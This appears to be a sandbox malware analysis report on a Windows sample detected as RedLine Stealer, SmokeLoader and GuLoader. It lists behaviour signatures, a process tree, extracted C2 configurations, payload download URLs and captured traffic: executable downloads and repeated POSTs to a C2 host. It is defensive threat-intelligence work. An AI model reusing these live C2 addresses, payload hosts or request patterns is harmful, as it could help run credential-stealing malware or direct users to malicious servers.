Loading ...

Play interactive tourEdit tour

Windows Analysis Report fw8ex1BNek.exe

Overview

General Information

Sample Name:fw8ex1BNek.exe
Analysis ID:542025
MD5:6a4b078a500c92ae7bbf3563a49fb100
SHA1:03005f11d47b9ef868df361c1603f33a9cee55fd
SHA256:a5acef0be0bd9993e756bb20a6b4e9fc2b1e819a02992255e4839d217ecf7258
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

GuLoader RedLine SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • fw8ex1BNek.exe (PID: 1624 cmdline: "C:\Users\user\Desktop\fw8ex1BNek.exe" MD5: 6A4B078A500C92AE7BBF3563A49FB100)
    • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • DB56.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\DB56.exe MD5: F2F8A2B12CB2E41FFBE135B6ED9B5B7C)
        • DB56.exe (PID: 4272 cmdline: C:\Users\user\AppData\Local\Temp\DB56.exe MD5: F2F8A2B12CB2E41FFBE135B6ED9B5B7C)
      • 4924.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\4924.exe MD5: 4C2D293F6A8F5AB1D869EFDFCD4AD41A)
      • 8CE5.exe (PID: 5548 cmdline: C:\Users\user\AppData\Local\Temp\8CE5.exe MD5: EC1105BE312FD184FFC9D7F272D64B87)
  • acgvitw (PID: 1752 cmdline: C:\Users\user\AppData\Roaming\acgvitw MD5: 6A4B078A500C92AE7BBF3563A49FB100)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "45.9.20.240:46257"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}

Threatname: SmokeLoader

{"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.fw8ex1BNek.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              0.2.fw8ex1BNek.exe.630e50.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                23.2.4924.exe.21e6516.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  23.2.4924.exe.2610000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    23.2.4924.exe.2440000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 21 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://45.9.20.240:7769/Igno.exeAvira URL Cloud: Label: malware
                      Source: http://185.112.83.8/install3.exeAvira URL Cloud: Label: malware
                      Source: http://galala.ru/upload/Avira URL Cloud: Label: malware
                      Source: http://witra.ru/upload/Avira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmpMalware Configuration Extractor: RedLine {"C2 url": "45.9.20.240:46257"}
                      Source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}
                      Source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: fw8ex1BNek.exeVirustotal: Detection: 39%Perma Link
                      Source: fw8ex1BNek.exeReversingLabs: Detection: 37%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: rcacademy.atVirustotal: Detection: 11%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeReversingLabs: Detection: 17%
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Roaming\acgvitwReversingLabs: Detection: 37%
                      Machine Learning detection for sampleShow sources
                      Source: fw8ex1BNek.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\acgvitwJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeUnpacked PE file: 23.2.4924.exe.400000.0.unpack
                      Source: fw8ex1BNek.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2
                      Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
                      Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
                      Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeDomain query: www.bastinscustomfab.com
                      Source: C:\Windows\explorer.exeDomain query: rcacademy.at
                      Source: C:\Windows\explorer.exeDomain query: bastinscustomfab.com
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 7769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7769 -> 49850
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://185.112.83.8/InjectHollowing.bin
                      Source: Malware configuration extractorURLs: http://rcacademy.at/upload/
                      Source: Malware configuration extractorURLs: http://e-lanpengeonline.com/upload/
                      Source: Malware configuration extractorURLs: http://vjcmvz.cn/upload/
                      Source: Malware configuration extractorURLs: http://galala.ru/upload/
                      Source: Malware configuration extractorURLs: http://witra.ru/upload/
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 17 Dec 2021 07:07:38 GMTAccept-Ranges: bytesETag: "8d927cc614f3d71:0"Server: Microsoft-IIS/10.0Date: Sat, 18 Dec 2021 14:32:43 GMTContent-Length: 94424Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 a6 2f 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 48 0e 00 00 00 00 00 00 00 00 00 00 88 5c 01 00 50 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 48 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bastinscustomfab.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.bastinscustomfab.comCookie: PHPSESSID=905f1348cca402f214daeb63de69114c
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbhfij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uexckctm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydnswljr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyedgkcsgg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rydxhqucb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwbia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwahbovc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvqqrvitjv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pawqkjnqlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbely.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfquy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svlbtjow.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrenwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kliyespolk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hjmjrvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvgdwnrq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqvtkcroe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wayrnqsako.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayamwyb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gffroy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ysuckj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmchuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tnsiunfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydbdqcx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://myjlsdvf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfeippj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgwuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvxkwka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: GET /Igno.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.20.240:7769
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbswig.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmxlxoqtyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwwgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwrqu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hetky.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wadndxm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whrkpnnn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udjjtqdogg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyvwwwlnbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwrfdbfbaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: GET /install3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvyrwnlgbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbwucidikt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwmsuk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkybqrxqpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaqwoemuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyexyommxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jawmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: rcacademy.at
